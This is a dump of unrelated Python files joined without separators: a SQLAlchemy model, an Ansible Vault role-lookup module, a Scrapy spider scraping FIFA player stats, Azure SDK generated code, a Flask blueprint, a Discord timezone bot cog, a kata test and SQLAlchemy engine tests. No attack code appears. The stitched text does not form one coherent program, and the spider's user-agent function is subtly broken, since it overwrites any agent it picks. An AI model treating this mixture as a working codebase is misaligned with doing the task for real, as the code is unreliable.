    Integer, \
    String, Text


class Project(CoreCatBaseMixin, Base):
    """Project Model class represent for the 'projects' table
    which is used to store project's basic information."""

    # Add the real table name here.
    # TODO: Add the database prefix here
    __tablename__ = 'project'

    # Column definition
    project_id = Column('id', Integer,
                        primary_key=True,
                        autoincrement=True
                        )
    project_name = Column('name', String(100),
                          nullable=False
                          )
    project_description = Column('description', Text,
                                 nullable=True
                                 )

    # Relationship
    # TODO: Building relationship

    def __init__(self, project_name,
                 created_by_user_id,
                 **kwargs):
        """
        Constructor of Project Model Class.

        :param project_name: Name of the project.
        :param created_by_user_id: Project is created under this user ID.
        :param project_description: Description of the project.
        """

        self.set_up_basic_information(
            MODEL_VERSION[OBJECT_CODES['Project']],
            created_by_user_id
        )
        self.project_name = project_name
        self.project_description = kwargs.get('project_description', None)

#!/usr/bin/env python
from ansible.module_utils.hashivault import hashivault_argspec
from ansible.module_utils.hashivault import hashivault_auth_client
from ansible.module_utils.hashivault import hashivault_init
from ansible.module_utils.hashivault import hashiwrapper

ANSIBLE_METADATA = {'status': ['stableinterface'], 'supported_by': 'community', 'version': '1.1'}
DOCUMENTATION = '''
---
module: hashivault_approle_role_get
version_added: "3.8.0"
short_description: Hashicorp Vault approle role get module
description:
    - Module to get a approle role from Hashicorp Vault.
options:
    name:
        description:
            - role name.
    mount_point:
        description:
            - mount point for role
        default: approle
extends_documentation_fragment: hashivault
'''
EXAMPLES = '''
---
- hosts: localhost
  tasks:
    - hashivault_approle_role_get:
        name: 'ashley'
      register: 'vault_approle_role_get'
    - debug: msg="Role is {{vault_approle_role_get.role}}"
'''


def main():
    argspec = hashivault_argspec()
    argspec['name'] = dict(required=True, type='str')
    argspec['mount_point'] = dict(required=False, type='str', default='approle')
    module = hashivault_init(argspec)
    result = hashivault_approle_role_get(module.params)
    if result.get('failed'):
        module.fail_json(**result)
    else:
        module.exit_json(**result)


@hashiwrapper
def hashivault_approle_role_get(params):
    name = params.get('name')
    client = hashivault_auth_client(params)
    result = client.get_role(name, mount_point=params.get('mount_point'))
    return {'role': result}


if __name__ == '__main__':
    main()

from scrapy.spiders import Spider
from scrapy.selector import Selector
from scrapy.http import HtmlResponse
from FIFAscrape.items import PlayerItem
from urlparse import urlparse, urljoin
from scrapy.http.request import Request
from scrapy.conf import settings
import random
import time

class fifaSpider(Spider):
    name = "fifa"
    allowed_domains = ["futhead.com"]
    start_urls = [
        "http://www.futhead.com/16/players/?level=all_nif&bin_platform=ps"
    ]
	

    def parse(self, response):
        #obtains links from page to page and passes links to parse_playerURL
        sel = Selector(response)    #define selector based on response object (points to urls in start_urls by default) 
        url_list = sel.xpath('//a[@class="display-block padding-0"]/@href')   #obtain a list of href links that contain relative links of players
        for i in url_list:
            relative_url = self.clean_str(i.extract())    #i is a selector and hence need to extract it to obtain unicode object
            print urljoin(response.url, relative_url)   #urljoin is able to merge absolute and relative paths to form 1 coherent link
            req = Request(urljoin(response.url, relative_url),callback=self.parse_playerURL)   #pass on request with new urls to parse_playerURL
            req.headers["User-Agent"] = self.random_ua()    
            yield req
        
        next_url=sel.xpath('//div[@class="right-nav pull-right"]/a[@rel="next"]/@href').extract_first()  
        if(next_url):                                                                       #checks if next page exists
            clean_next_url = self.clean_str(next_url)
            reqNext = Request(urljoin(response.url, clean_next_url),callback=self.parse)    #calls back this function to repeat process on new list of links
            yield reqNext
         
    def parse_playerURL(self, response):    
        #parses player specific data into items list
        site = Selector(response)
        items = []
        item = PlayerItem()
        item['1name'] = (response.url).rsplit("/")[-2].replace("-"," ")
        title = self.clean_str(site.xpath('/html/head/title/text()').extract_first())
        item['OVR'] = title.partition("FIFA 16 -")[1].split("-")[0]
        item['POS'] = self.clean_str(site.xpath('//div[@class="playercard-position"]/text()').extract_first())
        #stats = site.xpath('//div[@class="row player-center-container"]/div/a')
        stat_names = site.xpath('//span[@class="player-stat-title"]')
        stat_values = site.xpath('//span[contains(@class, "player-stat-value")]')
        for index in range(len(stat_names)):
            attr_name = stat_names[index].xpath('.//text()').extract_first()
            item[attr_name] = stat_values[index].xpath('.//text()').extract_first()
        items.append(item)
        return items
        
    def clean_str(self,ustring):    
        #removes wierd unicode chars (/u102 bla), whitespaces, tabspaces, etc to form clean string 
        return str(ustring.encode('ascii', 'replace')).strip()
        
    def random_ua(self):
        #randomise user-agent from list to reduce chance of being banned
        ua  = random.choice(settings.get('USER_AGENT_LIST'))
        if ua:
            ua='Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'
        return ua
        

print("hello!!!!")
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------

from copy import deepcopy
from typing import Any, Awaitable, Optional, TYPE_CHECKING

from azure.core.rest import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer

from .. import models
from ._configuration import SqlVirtualMachineManagementClientConfiguration
from .operations import AvailabilityGroupListenersOperations, Operations, SqlVirtualMachineGroupsOperations, SqlVirtualMachinesOperations

if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from azure.core.credentials_async import AsyncTokenCredential

class SqlVirtualMachineManagementClient:
    """The SQL virtual machine management API provides a RESTful set of web APIs that interact with Azure Compute, Network & Storage services to manage your SQL Server virtual machine. The API enables users to create, delete and retrieve a SQL virtual machine, SQL virtual machine group or availability group listener.

    :ivar availability_group_listeners: AvailabilityGroupListenersOperations operations
    :vartype availability_group_listeners:
     azure.mgmt.sqlvirtualmachine.aio.operations.AvailabilityGroupListenersOperations
    :ivar operations: Operations operations
    :vartype operations: azure.mgmt.sqlvirtualmachine.aio.operations.Operations
    :ivar sql_virtual_machine_groups: SqlVirtualMachineGroupsOperations operations
    :vartype sql_virtual_machine_groups:
     azure.mgmt.sqlvirtualmachine.aio.operations.SqlVirtualMachineGroupsOperations
    :ivar sql_virtual_machines: SqlVirtualMachinesOperations operations
    :vartype sql_virtual_machines:
     azure.mgmt.sqlvirtualmachine.aio.operations.SqlVirtualMachinesOperations
    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials_async.AsyncTokenCredential
    :param subscription_id: Subscription ID that identifies an Azure subscription.
    :type subscription_id: str
    :param base_url: Service URL. Default value is 'https://management.azure.com'.
    :type base_url: str
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    """

    def __init__(
        self,
        credential: "AsyncTokenCredential",
        subscription_id: str,
        base_url: str = "https://management.azure.com",
        **kwargs: Any
    ) -> None:
        self._config = SqlVirtualMachineManagementClientConfiguration(credential=credential, subscription_id=subscription_id, **kwargs)
        self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)

        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)
        self._serialize.client_side_validation = False
        self.availability_group_listeners = AvailabilityGroupListenersOperations(self._client, self._config, self._serialize, self._deserialize)
        self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)
        self.sql_virtual_machine_groups = SqlVirtualMachineGroupsOperations(self._client, self._config, self._serialize, self._deserialize)
        self.sql_virtual_machines = SqlVirtualMachinesOperations(self._client, self._config, self._serialize, self._deserialize)


    def _send_request(
        self,
        request: HttpRequest,
        **kwargs: Any
    ) -> Awaitable[AsyncHttpResponse]:
        """Runs the network request through the client's chained policies.

        >>> from azure.core.rest import HttpRequest
        >>> request = HttpRequest("GET", "https://www.example.org/")
        <HttpRequest [GET], url: 'https://www.example.org/'>
        >>> response = await client._send_request(request)
        <AsyncHttpResponse: 200 OK>

        For more information on this code flow, see https://aka.ms/azsdk/python/protocol/quickstart

        :param request: The network request you want to make. Required.
        :type request: ~azure.core.rest.HttpRequest
        :keyword bool stream: Whether the response payload will be streamed. Defaults to False.
        :return: The response of your network call. Does not do error handling on your response.
        :rtype: ~azure.core.rest.AsyncHttpResponse
        """

        request_copy = deepcopy(request)
        request_copy.url = self._client.format_url(request_copy.url)
        return self._client.send_request(request_copy, **kwargs)

    async def close(self) -> None:
        await self._client.close()

    async def __aenter__(self) -> "SqlVirtualMachineManagementClient":
        await self._client.__aenter__()
        return self

    async def __aexit__(self, *exc_details) -> None:
        await self._client.__aexit__(*exc_details)

from flask import Blueprint, request, render_template
from ..load import processing_results
from ..abbr import get_abbr_map

abbr_map = get_abbr_map()
liner_mod = Blueprint('liner', __name__, template_folder='templates', static_folder='static')


@liner_mod.route('/liner', methods=['GET', 'POST'])
def liner():
    if request.method == 'POST':
        query = request.form['liner-text']
        text = query.split('.')[:-1]
        if len(text) == 0:
            return render_template('projects/line.html', message='Please separate each line with "."')

        abbr_expanded_text = ""
        for word in query.split():
            if word in abbr_map:
                abbr_expanded_text += abbr_map[word]
            else:
                abbr_expanded_text += word
            abbr_expanded_text += " " 

        data, emotion_sents, score, line_sentiment, text, length = processing_results(text)
        return render_template('projects/line.html', data=[data, emotion_sents, score, zip(text, line_sentiment), length, abbr_expanded_text])
    else:
        return render_template('projects/line.html')

# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from msrest.serialization import Model


class Dimension(Model):
    """Dimension of a resource metric. For e.g. instance specific HTTP requests
    for a web app,
    where instance name is dimension of the metric HTTP request.

    :param name:
    :type name: str
    :param display_name:
    :type display_name: str
    :param internal_name:
    :type internal_name: str
    :param to_be_exported_for_shoebox:
    :type to_be_exported_for_shoebox: bool
    """

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'display_name': {'key': 'displayName', 'type': 'str'},
        'internal_name': {'key': 'internalName', 'type': 'str'},
        'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
    }

    def __init__(self, name=None, display_name=None, internal_name=None, to_be_exported_for_shoebox=None):
        super(Dimension, self).__init__()
        self.name = name
        self.display_name = display_name
        self.internal_name = internal_name
        self.to_be_exported_for_shoebox = to_be_exported_for_shoebox

import asyncio
import discord
import datetime
import pytz
from   discord.ext import commands
from   Cogs import FuzzySearch
from   Cogs import Settings
from   Cogs import DisplayName
from   Cogs import Message
from   Cogs import Nullify

class Time:

	# Init with the bot reference, and a reference to the settings var
	def __init__(self, bot, settings):
		self.bot = bot
		self.settings = settings


	@commands.command(pass_context=True)
	async def settz(self, ctx, *, tz : str = None):
		"""Sets your TimeZone - Overrides your UTC offset - and accounts for DST."""
		usage = 'Usage: `{}settz [Region/City]`\nYou can get a list of available TimeZones with `{}listtz`'.format(ctx.prefix, ctx.prefix)
		if not tz:
			self.settings.setGlobalUserStat(ctx.author, "TimeZone", None)
			await ctx.channel.send("*{}*, your TimeZone has been removed!".format(DisplayName.name(ctx.author)))
			return
		
		# Let's get the timezone list
		tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
		if not tz_list[0]['Ratio'] == 1:
			# We didn't find a complete match
			msg = "I couldn't find that TimeZone!\n\nMaybe you meant one of the following?\n```"
			for tz in tz_list:
				msg += tz['Item'] + "\n"
			msg += '```'
			await ctx.channel.send(msg)
			return
		# We got a time zone
		self.settings.setGlobalUserStat(ctx.author, "TimeZone", tz_list[0]['Item'])
		await ctx.channel.send("TimeZone set to *{}!*".format(tz_list[0]['Item']))

	
	@commands.command(pass_context=True)
	async def listtz(self, ctx, *, tz_search = None):
		"""List all the supported TimeZones in PM."""

		if not tz_search:
			msg = "__Available TimeZones:__\n\n"
			for tz in pytz.all_timezones:
				msg += tz + "\n"
		else:
			tz_list = FuzzySearch.search(tz_search, pytz.all_timezones)
			msg = "__Top 3 TimeZone Matches:__\n\n"
			for tz in tz_list:
				msg += tz['Item'] + "\n"

		await Message.say(self.bot, msg, ctx.channel, ctx.author, 1)


	@commands.command(pass_context=True)
	async def tz(self, ctx, *, member = None):
		"""See a member's TimeZone."""
		# Check if we're suppressing @here and @everyone mentions
		if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
			suppress = True
		else:
			suppress = False

		if member == None:
			member = ctx.message.author

		if type(member) == str:
			# Try to get a user first
			memberName = member
			member = DisplayName.memberForName(memberName, ctx.message.guild)
			if not member:
				msg = 'Couldn\'t find user *{}*.'.format(memberName)
				# Check for suppress
				if suppress:
					msg = Nullify.clean(msg)
				await ctx.channel.send(msg)
				return

		# We got one
		timezone = self.settings.getGlobalUserStat(member, "TimeZone")
		if timezone == None:
			msg = '*{}* hasn\'t set their TimeZone yet - they can do so with the `{}settz [Region/City]` command.'.format(DisplayName.name(member), ctx.prefix)
			await ctx.channel.send(msg)
			return

		msg = '*{}\'s* TimeZone is *{}*'.format(DisplayName.name(member), timezone)
		await ctx.channel.send(msg)

		
	@commands.command(pass_context=True)
	async def setoffset(self, ctx, *, offset : str = None):
		"""Set your UTC offset."""

		if offset == None:
			self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", None)
			msg = '*{}*, your UTC offset has been removed!'.format(DisplayName.name(ctx.message.author))
			await ctx.channel.send(msg)
			return

		offset = offset.replace('+', '')

		# Split time string by : and get hour/minute values
		try:
			hours, minutes = map(int, offset.split(':'))
		except Exception:
			try:
				hours = int(offset)
				minutes = 0
			except Exception:
				await ctx.channel.send('Offset has to be in +-H:M!')
				return
		off = "{}:{}".format(hours, minutes)
		self.settings.setGlobalUserStat(ctx.message.author, "UTCOffset", off)
		msg = '*{}*, your UTC offset has been set to *{}!*'.format(DisplayName.name(ctx.message.author), off)
		await ctx.channel.send(msg)


	@commands.command(pass_context=True)
	async def offset(self, ctx, *, member = None):
		"""See a member's UTC offset."""

		# Check if we're suppressing @here and @everyone mentions
		if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
			suppress = True
		else:
			suppress = False

		if member == None:
			member = ctx.message.author

		if type(member) == str:
			# Try to get a user first
			memberName = member
			member = DisplayName.memberForName(memberName, ctx.message.guild)
			if not member:
				msg = 'Couldn\'t find user *{}*.'.format(memberName)
				# Check for suppress
				if suppress:
					msg = Nullify.clean(msg)
				await ctx.channel.send(msg)
				return

		# We got one
		offset = self.settings.getGlobalUserStat(member, "UTCOffset")
		if offset == None:
			msg = '*{}* hasn\'t set their offset yet - they can do so with the `{}setoffset [+-offset]` command.'.format(DisplayName.name(member), ctx.prefix)
			await ctx.channel.send(msg)
			return

		# Split time string by : and get hour/minute values
		try:
			hours, minutes = map(int, offset.split(':'))
		except Exception:
			try:
				hours = int(offset)
				minutes = 0
			except Exception:
				await ctx.channel.send('Offset has to be in +-H:M!')
				return
		
		msg = 'UTC'
		# Apply offset
		if hours > 0:
			# Apply positive offset
			msg += '+{}'.format(offset)
		elif hours < 0:
			# Apply negative offset
			msg += '{}'.format(offset)

		msg = '*{}\'s* offset is *{}*'.format(DisplayName.name(member), msg)
		await ctx.channel.send(msg)


	@commands.command(pass_context=True)
	async def time(self, ctx, *, offset : str = None):
		"""Get UTC time +- an offset."""
		timezone = None
		if offset == None:
			member = ctx.message.author
		else:
			# Try to get a user first
			member = DisplayName.memberForName(offset, ctx.message.guild)

		if member:
			# We got one
			# Check for timezone first
			offset = self.settings.getGlobalUserStat(member, "TimeZone")
			if offset == None:
				offset = self.settings.getGlobalUserStat(member, "UTCOffset")
		
		if offset == None:
			msg = '*{}* hasn\'t set their TimeZone or offset yet - they can do so with the `{}setoffset [+-offset]` or `{}settz [Region/City]` command.\nThe current UTC time is *{}*.'.format(DisplayName.name(member), ctx.prefix, ctx.prefix, datetime.datetime.utcnow().strftime("%I:%M %p"))
			await ctx.channel.send(msg)
			return

		# At this point - we need to determine if we have an offset - or possibly a timezone passed
		t = self.getTimeFromTZ(offset)
		if t == None:
			# We did not get an offset
			t = self.getTimeFromOffset(offset)
			if t == None:
				await ctx.channel.send("I couldn't find that TimeZone or offset!")
				return

		if member:
			msg = '{}; where *{}* is, it\'s currently *{}*'.format(t["zone"], DisplayName.name(member), t["time"])
		else:
			msg = '{} is currently *{}*'.format(t["zone"], t["time"])
		
		# Say message
		await ctx.channel.send(msg)


	def getTimeFromOffset(self, offset):
		offset = offset.replace('+', '')
		# Split time string by : and get hour/minute values
		try:
			hours, minutes = map(int, offset.split(':'))
		except Exception:
			try:
				hours = int(offset)
				minutes = 0
			except Exception:
				return None
				# await ctx.channel.send('Offset has to be in +-H:M!')
				# return
		msg = 'UTC'
		# Get the time
		t = datetime.datetime.utcnow()
		# Apply offset
		if hours > 0:
			# Apply positive offset
			msg += '+{}'.format(offset)
			td = datetime.timedelta(hours=hours, minutes=minutes)
			newTime = t + td
		elif hours < 0:
			# Apply negative offset
			msg += '{}'.format(offset)
			td = datetime.timedelta(hours=(-1*hours), minutes=(-1*minutes))
			newTime = t - td
		else:
			# No offset
			newTime = t
		return { "zone" : msg, "time" : newTime.strftime("%I:%M %p") }


	def getTimeFromTZ(self, tz):
		# Assume sanitized zones - as they're pulled from pytz
		# Let's get the timezone list
		tz_list = FuzzySearch.search(tz, pytz.all_timezones, None, 3)
		if not tz_list[0]['Ratio'] == 1:
			# We didn't find a complete match
			return None
		zone = pytz.timezone(tz_list[0]['Item'])
		zone_now = datetime.datetime.now(zone)
		return { "zone" : tz_list[0]['Item'], "time" : zone_now.strftime("%I:%M %p") }
import unittest

from katas.beta.what_color_is_your_name import string_color


class StringColorTestCase(unittest.TestCase):
    def test_equal_1(self):
        self.assertEqual(string_color('Jack'), '79CAE5')

    def test_equal_2(self):
        self.assertEqual(string_color('Joshua'), '6A10D6')

    def test_equal_3(self):
        self.assertEqual(string_color('Joshua Smith'), '8F00FB')

    def test_equal_4(self):
        self.assertEqual(string_color('Hayden Smith'), '7E00EE')

    def test_equal_5(self):
        self.assertEqual(string_color('Mathew Smith'), '8B00F1')

    def test_is_none_1(self):
        self.assertIsNone(string_color('a'))

# coding: utf-8

from sqlalchemy.testing import eq_, assert_raises, assert_raises_message, \
    config, is_
import re
from sqlalchemy.testing.util import picklers
from sqlalchemy.interfaces import ConnectionProxy
from sqlalchemy import MetaData, Integer, String, INT, VARCHAR, func, \
    bindparam, select, event, TypeDecorator, create_engine, Sequence
from sqlalchemy.sql import column, literal
from sqlalchemy.testing.schema import Table, Column
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing import engines
from sqlalchemy import util
from sqlalchemy.testing.engines import testing_engine
import logging.handlers
from sqlalchemy.dialects.oracle.zxjdbc import ReturningParam
from sqlalchemy.engine import result as _result, default
from sqlalchemy.engine.base import Engine
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock, call, patch
from contextlib import contextmanager

users, metadata, users_autoinc = None, None, None
class ExecuteTest(fixtures.TestBase):
    __backend__ = True

    @classmethod
    def setup_class(cls):
        global users, users_autoinc, metadata
        metadata = MetaData(testing.db)
        users = Table('users', metadata,
            Column('user_id', INT, primary_key=True, autoincrement=False),
            Column('user_name', VARCHAR(20)),
        )
        users_autoinc = Table('users_autoinc', metadata,
            Column('user_id', INT, primary_key=True,
                                    test_needs_autoincrement=True),
            Column('user_name', VARCHAR(20)),
        )
        metadata.create_all()

    @engines.close_first
    def teardown(self):
        testing.db.execute(users.delete())

    @classmethod
    def teardown_class(cls):
        metadata.drop_all()

    @testing.fails_on("postgresql+pg8000",
            "pg8000 still doesn't allow single % without params")
    def test_no_params_option(self):
        stmt = "SELECT '%'" + testing.db.dialect.statement_compiler(
                                    testing.db.dialect, None).default_from()

        conn = testing.db.connect()
        result = conn.\
                execution_options(no_parameters=True).\
                scalar(stmt)
        eq_(result, '%')

    @testing.fails_on_everything_except('firebird',
                                        'sqlite', '+pyodbc',
                                        '+mxodbc', '+zxjdbc', 'mysql+oursql')
    def test_raw_qmark(self):
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', (1, 'jack'))
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', [2, 'fred'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', [3, 'ed'], [4, 'horse'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', (5, 'barney'), (6, 'donkey'))
            conn.execute('insert into users (user_id, user_name) '
                         'values (?, ?)', 7, 'sally')
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [
                (1, 'jack'),
                (2, 'fred'),
                (3, 'ed'),
                (4, 'horse'),
                (5, 'barney'),
                (6, 'donkey'),
                (7, 'sally'),
                ]
            for multiparam, param in [
                (("jack", "fred"), {}),
                ((["jack", "fred"],), {})
            ]:
                res = conn.execute(
                    "select * from users where user_name=? or "
                    "user_name=? order by user_id",
                    *multiparam, **param)
                assert res.fetchall() == [
                    (1, 'jack'),
                    (2, 'fred')
                ]
            res = conn.execute("select * from users where user_name=?",
                "jack"
            )
            assert res.fetchall() == [(1, 'jack')]
            conn.execute('delete from users')

        go(testing.db)
        conn = testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    # some psycopg2 versions bomb this.
    @testing.fails_on_everything_except('mysql+mysqldb', 'mysql+pymysql',
            'mysql+cymysql', 'mysql+mysqlconnector', 'postgresql')
    @testing.fails_on('postgresql+zxjdbc', 'sprintf not supported')
    def test_raw_sprintf(self):
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (%s, %s)', [1, 'jack'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (%s, %s)', [2, 'ed'], [3, 'horse'])
            conn.execute('insert into users (user_id, user_name) '
                         'values (%s, %s)', 4, 'sally')
            conn.execute('insert into users (user_id) values (%s)', 5)
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [(1, 'jack'), (2, 'ed'), (3,
                    'horse'), (4, 'sally'), (5, None)]
            for multiparam, param in [
                (("jack", "ed"), {}),
                ((["jack", "ed"],), {})
            ]:
                res = conn.execute(
                    "select * from users where user_name=%s or "
                    "user_name=%s order by user_id",
                    *multiparam, **param)
                assert res.fetchall() == [
                    (1, 'jack'),
                    (2, 'ed')
                ]
            res = conn.execute("select * from users where user_name=%s",
                "jack"
            )
            assert res.fetchall() == [(1, 'jack')]

            conn.execute('delete from users')
        go(testing.db)
        conn = testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    # pyformat is supported for mysql, but skipping because a few driver
    # versions have a bug that bombs out on this test. (1.2.2b3,
    # 1.2.2c1, 1.2.2)

    @testing.skip_if(lambda : testing.against('mysql+mysqldb'),
                     'db-api flaky')
    @testing.fails_on_everything_except('postgresql+psycopg2',
            'postgresql+pypostgresql', 'mysql+mysqlconnector',
            'mysql+pymysql', 'mysql+cymysql')
    def test_raw_python(self):
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (%(id)s, %(name)s)', {'id': 1, 'name'
                         : 'jack'})
            conn.execute('insert into users (user_id, user_name) '
                         'values (%(id)s, %(name)s)', {'id': 2, 'name'
                         : 'ed'}, {'id': 3, 'name': 'horse'})
            conn.execute('insert into users (user_id, user_name) '
                         'values (%(id)s, %(name)s)', id=4, name='sally'
                         )
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [(1, 'jack'), (2, 'ed'), (3,
                    'horse'), (4, 'sally')]
            conn.execute('delete from users')
        go(testing.db)
        conn = testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    @testing.fails_on_everything_except('sqlite', 'oracle+cx_oracle')
    def test_raw_named(self):
        def go(conn):
            conn.execute('insert into users (user_id, user_name) '
                         'values (:id, :name)', {'id': 1, 'name': 'jack'
                         })
            conn.execute('insert into users (user_id, user_name) '
                         'values (:id, :name)', {'id': 2, 'name': 'ed'
                         }, {'id': 3, 'name': 'horse'})
            conn.execute('insert into users (user_id, user_name) '
                         'values (:id, :name)', id=4, name='sally')
            res = conn.execute('select * from users order by user_id')
            assert res.fetchall() == [(1, 'jack'), (2, 'ed'), (3,
                    'horse'), (4, 'sally')]
            conn.execute('delete from users')
        go(testing.db)
        conn= testing.db.connect()
        try:
            go(conn)
        finally:
            conn.close()

    @testing.engines.close_open_connections
    def test_exception_wrapping_dbapi(self):
        conn = testing.db.connect()
        for _c in testing.db, conn:
            assert_raises_message(
                tsa.exc.DBAPIError,
                r"not_a_valid_statement",
                _c.execute, 'not_a_valid_statement'
            )

    @testing.requires.sqlite
    def test_exception_wrapping_non_dbapi_error(self):
        e = create_engine('sqlite://')
        e.dialect.is_disconnect = is_disconnect = Mock()

        with e.connect() as c:
            c.connection.cursor = Mock(
                    return_value=Mock(
                        execute=Mock(
                                side_effect=TypeError("I'm not a DBAPI error")
                        ))
                    )

            assert_raises_message(
                TypeError,
                "I'm not a DBAPI error",
                c.execute, "select "
            )
            eq_(is_disconnect.call_count, 0)


    def test_exception_wrapping_non_dbapi_statement(self):
        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                raise Exception("nope")

        def _go(conn):
            assert_raises_message(
                tsa.exc.StatementError,
                r"nope \(original cause: Exception: nope\) u?'SELECT 1 ",
                conn.execute,
                    select([1]).\
                        where(
                            column('foo') == literal('bar', MyType())
                        )
            )
        _go(testing.db)
        conn = testing.db.connect()
        try:
            _go(conn)
        finally:
            conn.close()

    def test_stmt_exception_non_ascii(self):
        name = util.u('méil')
        with testing.db.connect() as conn:
            assert_raises_message(
                tsa.exc.StatementError,
                util.u(
                    "A value is required for bind parameter 'uname'"
                    r'.*SELECT users.user_name AS .m\\xe9il.') if util.py2k
                else
                    util.u(
                        "A value is required for bind parameter 'uname'"
                        '.*SELECT users.user_name AS .méil.')
                    ,
                conn.execute,
                select([users.c.user_name.label(name)]).where(
                                users.c.user_name == bindparam("uname")),
                {'uname_incorrect': 'foo'}
            )

    def test_stmt_exception_pickleable_no_dbapi(self):
        self._test_stmt_exception_pickleable(Exception("hello world"))

    @testing.crashes("postgresql+psycopg2",
                "Older versions don't support cursor pickling, newer ones do")
    @testing.fails_on("mysql+oursql",
                "Exception doesn't come back exactly the same from pickle")
    @testing.fails_on("mysql+mysqlconnector",
                "Exception doesn't come back exactly the same from pickle")
    @testing.fails_on("oracle+cx_oracle",
                        "cx_oracle exception seems to be having "
                        "some issue with pickling")
    def test_stmt_exception_pickleable_plus_dbapi(self):
        raw = testing.db.raw_connection()
        the_orig = None
        try:
            try:
                cursor = raw.cursor()
                cursor.execute("SELECTINCORRECT")
            except testing.db.dialect.dbapi.DatabaseError as orig:
                # py3k has "orig" in local scope...
                the_orig = orig
        finally:
            raw.close()
        self._test_stmt_exception_pickleable(the_orig)

    def _test_stmt_exception_pickleable(self, orig):
        for sa_exc in (
            tsa.exc.StatementError("some error",
                            "select * from table",
                           {"foo":"bar"},
                            orig),
            tsa.exc.InterfaceError("select * from table",
                            {"foo":"bar"},
                            orig),
            tsa.exc.NoReferencedTableError("message", "tname"),
            tsa.exc.NoReferencedColumnError("message", "tname", "cname"),
            tsa.exc.CircularDependencyError("some message", [1, 2, 3], [(1, 2), (3, 4)]),
        ):
            for loads, dumps in picklers():
                repickled = loads(dumps(sa_exc))
                eq_(repickled.args[0], sa_exc.args[0])
                if isinstance(sa_exc, tsa.exc.StatementError):
                    eq_(repickled.params, {"foo":"bar"})
                    eq_(repickled.statement, sa_exc.statement)
                    if hasattr(sa_exc, "connection_invalidated"):
                        eq_(repickled.connection_invalidated,
                            sa_exc.connection_invalidated)
                    eq_(repickled.orig.args[0], orig.args[0])

    def test_dont_wrap_mixin(self):
        class MyException(Exception, tsa.exc.DontWrapMixin):
            pass

        class MyType(TypeDecorator):
            impl = Integer
            def process_bind_param(self, value, dialect):
                raise MyException("nope")

        def _go(conn):
            assert_raises_message(
                MyException,
                "nope",
                conn.execute,
                    select([1]).\
                        where(
                            column('foo') == literal('bar', MyType())
                        )
            )
        _go(testing.db)
        conn = testing.db.connect()
        try:
            _go(conn)
        finally:
            conn.close()

    def test_empty_insert(self):
        """test that execute() interprets [] as a list with no params"""

        testing.db.execute(users_autoinc.insert().
                    values(user_name=bindparam('name', None)), [])
        eq_(testing.db.execute(users_autoinc.select()).fetchall(), [(1, None)])

    @testing.requires.ad_hoc_engines
    def test_engine_level_options(self):
        eng = engines.testing_engine(options={'execution_options':
                                            {'foo': 'bar'}})
        with eng.contextual_connect() as conn:
            eq_(conn._execution_options['foo'], 'bar')
            eq_(conn.execution_options(bat='hoho')._execution_options['foo'
                ], 'bar')
            eq_(conn.execution_options(bat='hoho')._execution_options['bat'
                ], 'hoho')
            eq_(conn.execution_options(foo='hoho')._execution_options['foo'
                ], 'hoho')
            eng.update_execution_options(foo='hoho')
            conn = eng.contextual_connect()
            eq_(conn._execution_options['foo'], 'hoho')

    @testing.requires.ad_hoc_engines
    def test_generative_engine_execution_options(self):
        eng = engines.testing_engine(options={'execution_options':
                                            {'base': 'x1'}})

        eng1 = eng.execution_options(foo="b1")
        eng2 = eng.execution_options(foo="b2")
        eng1a = eng1.execution_options(bar="a1")
        eng2a = eng2.execution_options(foo="b3", bar="a2")

        eq_(eng._execution_options,
                {'base': 'x1'})
        eq_(eng1._execution_options,
                {'base': 'x1', 'foo': 'b1'})
        eq_(eng2._execution_options,
                {'base': 'x1', 'foo': 'b2'})
        eq_(eng1a._execution_options,
                {'base': 'x1', 'foo': 'b1', 'bar': 'a1'})
        eq_(eng2a._execution_options,
                {'base': 'x1', 'foo': 'b3', 'bar': 'a2'})
        is_(eng1a.pool, eng.pool)

        # test pool is shared
        eng2.dispose()
        is_(eng1a.pool, eng2.pool)
